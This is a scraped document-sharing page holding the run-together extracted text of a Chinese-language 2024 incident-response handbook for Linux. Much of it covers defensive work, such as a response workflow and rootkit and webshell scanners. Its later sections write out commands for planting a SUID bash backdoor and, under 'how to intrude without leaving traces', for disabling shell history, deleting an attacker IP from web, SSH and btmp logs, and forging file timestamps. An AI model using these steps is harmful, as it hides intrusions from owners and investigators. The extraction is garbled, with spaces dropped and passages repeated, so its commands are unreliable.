2024信息安全應(yīng)急手冊_第1頁
2024信息安全應(yīng)急手冊_第2頁
2024信息安全應(yīng)急手冊_第3頁
2024信息安全應(yīng)急手冊_第4頁
2024信息安全應(yīng)急手冊_第5頁
已閱讀5頁,還剩25頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

信息安全信息安全應(yīng)急手冊介紹內(nèi)容介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡1.應(yīng)急響應(yīng)流程1.應(yīng)急響應(yīng)流程PAGEPAGE3安全事件應(yīng)急流程圖3.安全事件3.安全事件分析安全事件發(fā)現(xiàn)安 準(zhǔn)備全運(yùn)維層

4.安全事件4.安全事件分類分級是

是否需要第8.安全事件總結(jié)8.安全事件恢復(fù)7.安全事件抑8.安全事件總結(jié)8.安全事件恢復(fù)7.安全事件抑制調(diào)5.事件上報

9.應(yīng)急預(yù)案更新是安全管 事件決策理 指導(dǎo)層6.協(xié)調(diào)處置安全事件6.協(xié)調(diào)處置安全事件安全事件

遠(yuǎn)程應(yīng)急響應(yīng)第三方組織(急人員)

了解安全事件情況(電話、郵件)

否確認(rèn)是否去現(xiàn)場是去現(xiàn)場應(yīng)急響應(yīng)安全事件線索常被篡改……

應(yīng)急分析ip找到攻擊途徑攻擊源ip些啥?加固建議

應(yīng)急報告介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡2.應(yīng)急重要點(diǎn)排查—linux目錄結(jié)構(gòu)2.應(yīng)急重要點(diǎn)排查—linux目錄結(jié)構(gòu)PAGEPAGE72.應(yīng)急重要點(diǎn)排查—linux常用進(jìn)程服務(wù)介紹2.應(yīng)急重要點(diǎn)排查—linux常用進(jìn)程服務(wù)介紹PAGEPAGE82.應(yīng)急重要點(diǎn)排查—linux應(yīng)急檢查點(diǎn)2.應(yīng)急重要點(diǎn)排查—linux應(yīng)急檢查點(diǎn)PAGEPAGE92.應(yīng)急重要點(diǎn)排查—linux常用應(yīng)急命令2.應(yīng)急重要點(diǎn)排查—linux常用應(yīng)急命令PAGEPAGE10介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡3.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹3.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹PAGEPAGE12內(nèi)核級后門檢查chkrootkit的使用project:#tar-zxvf#makesense#./chkrootkit發(fā)現(xiàn)內(nèi)核級后門以及netstat命令已被篡改2.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹2.應(yīng)急重要點(diǎn)排查—rootkit檢查工具介紹PAGEPAGE13內(nèi)核級后門檢查rkhunter的使用rootkithunter的使用Project:\hhttp://www.rootkit.nl/projects/rootkit_hunter.htmldownload:\h/rkhunter/rkhunter-1.3.4.tar.gz?use_mirror=jaist#tar-zxvfrkhunter-1.3.4.tar.gz#cdrkhunter-1.3.4#./installer.sh–h#./rkhunter-c發(fā)現(xiàn)內(nèi)核級后門3.應(yīng)急重要點(diǎn)排查—webshell檢查工具介紹3.應(yīng)急重要點(diǎn)排查—webshell檢查工具介紹PAGEPAGE14webshell后門檢查工具shelldete的使用Project:/emposha/PHP-Shell-Detector/zipball/masterdownload:/emposha/PHP-Shell-Detector/archive/master.zip#pythonshelldetect.py-dE:\測試工具\(yùn)webshell發(fā)現(xiàn)webshellwscan檢查工具的使用,選擇路徑即可進(jìn)行掃描webshellscanner檢查工具的使用,選擇文件類型選擇路徑即可進(jìn)行掃描對于是linux里的網(wǎng)站可以先把動態(tài)腳本打包回來,然后再用windowswebshell檢查工具檢查即可。#find/webroot-typef-name*.jsp|xargstarzcvfweb.tar.gz2.應(yīng)急重要點(diǎn)排查—異常日志檢查工具介紹2.應(yīng)急重要點(diǎn)排查—異常日志檢查工具介紹1717Web日志安全分析檢查工具的使用,選擇日志類型選擇路徑即可進(jìn)行掃描介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡5.安裝rootkit后門和發(fā)現(xiàn)后門5.安裝rootkit后門和發(fā)現(xiàn)后門PAGEPAGE19實(shí)驗(yàn)環(huán)境:Centos5.4后門工具:ddrk.tgzRootkit)是一個Linux結(jié)合shv和adore-ng優(yōu)點(diǎn)的,內(nèi)核級rootkit。已成功植入rookit無端口無進(jìn)程,現(xiàn)在我用一個干凈的netstat去執(zhí)行看看,./ps和直接執(zhí)行ps結(jié)果不一樣,ps也被替換。/setupport登陸后門成功拷貝一個干凈的netstat過來可以發(fā)現(xiàn)2013端口使用chkrootkit和rkhunter工具均可以發(fā)現(xiàn)后門PAGEPAGE5.安裝s權(quán)限位后門和發(fā)現(xiàn)s權(quán)限位后門PAGE22PAGE22[root@localhost~]#cp/bin/bash/tmp/.wp[root@localhost~]#chmod4755/tmp/.wp[root@localhost~]#suhacker[hacker@localhostroot]$/tmp/.wp-p檢查s權(quán)限位后門(需要root權(quán)限檢查)find/-typef-perm-04000PAGEPAGE6.安裝s權(quán)限位后門和發(fā)現(xiàn)s權(quán)限位后門PAGE23PAGE23[root@localhost~]#cp/bin/bash/tmp/.wp[root@localhost~]#chmod4755/tmp/.wp[root@localhost~]#suhacker[hacker@localhostroot]$/tmp/.wp-p檢查s權(quán)限位后門(需要root權(quán)限檢查)find/-typef-perm-04000介紹內(nèi)容1.應(yīng)急響應(yīng)流程2.重要檢查點(diǎn)排查3.常用應(yīng)急命令和工具排查4.應(yīng)急響應(yīng)案例介紹5.安裝后門和發(fā)現(xiàn)后門6.如何入侵不留痕跡6.如何入侵不留痕跡6.如何入侵不留痕跡PAGEPAGE25linux日志追蹤與清除/var/log/secure:登錄ssh登陸或者失敗的日志記錄/var/log/wtmp:記錄登錄者訊錄,二進(jìn)制文件,須用last來讀取內(nèi)容/var/log/btmp;記錄登錄失敗的ip/root/.bash_histroy 記錄輸入過的命令/var/www/log/access_log apache記錄日志exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=0刪除你的websed-i/520.520.520.520/daccess_log*3.替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.14.刪除last日志記錄的日志:btmp為二進(jìn)制文件需要strings導(dǎo)出。stringsbtmp>btmp.1sed-i's/520.520.520.520/d'btmp.1touch-r舊btmp新btmp.1偽造新創(chuàng)建btmp.1的時間為之前的時間rm-rf舊btmpmvbtmp.1btmp6.如何入侵不留痕跡—清除日志6.如何入侵不留痕跡—清除日志PAGEPAGE26linux日志追蹤與清除/var/log/secure:登錄ssh登陸或者失敗的日志記錄/var/log/wtmp:記錄登錄者訊錄,二進(jìn)制文件,須用last來讀取內(nèi)容/var/log/btmp;記錄登錄失敗的ip/root/.bash_histroy 記錄輸入過的命令/var/www/log/access_log apache記錄日志1.exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=02.刪除你的web訪問日志:sed-i'/520.520.520.520/d'access_log*3.替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.14.刪除last日志記錄的日志:btmp為二進(jìn)制文件需要strings導(dǎo)出。stringsbtmp>btmp.1sed-i's/520.520.520.520/d'btmp.1touch-r舊btmp新btmp.1偽造新創(chuàng)建btmp.1的時間為之前的時間rm-rf舊btmpmvbtmp.1btmp6.如何入侵不留痕跡—不記錄history日志6.如何入侵不留痕跡—不記錄history日志PAGEPAGE27讓系統(tǒng)不記錄你的history記錄:#替換你的登錄ssh的日志:sed-i's/520.520.520.520//g'secure.16.如何入侵不留痕跡—不記錄history日志6.如何入侵不留痕跡—不記錄history日志8822讓系統(tǒng)不記錄你的ssh登陸ip記錄:#exportHISTFILE=/dev/null;exportHISTSIZE=0;exportHISTFILESIZE=06.如何入侵不留痕跡—不記錄

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論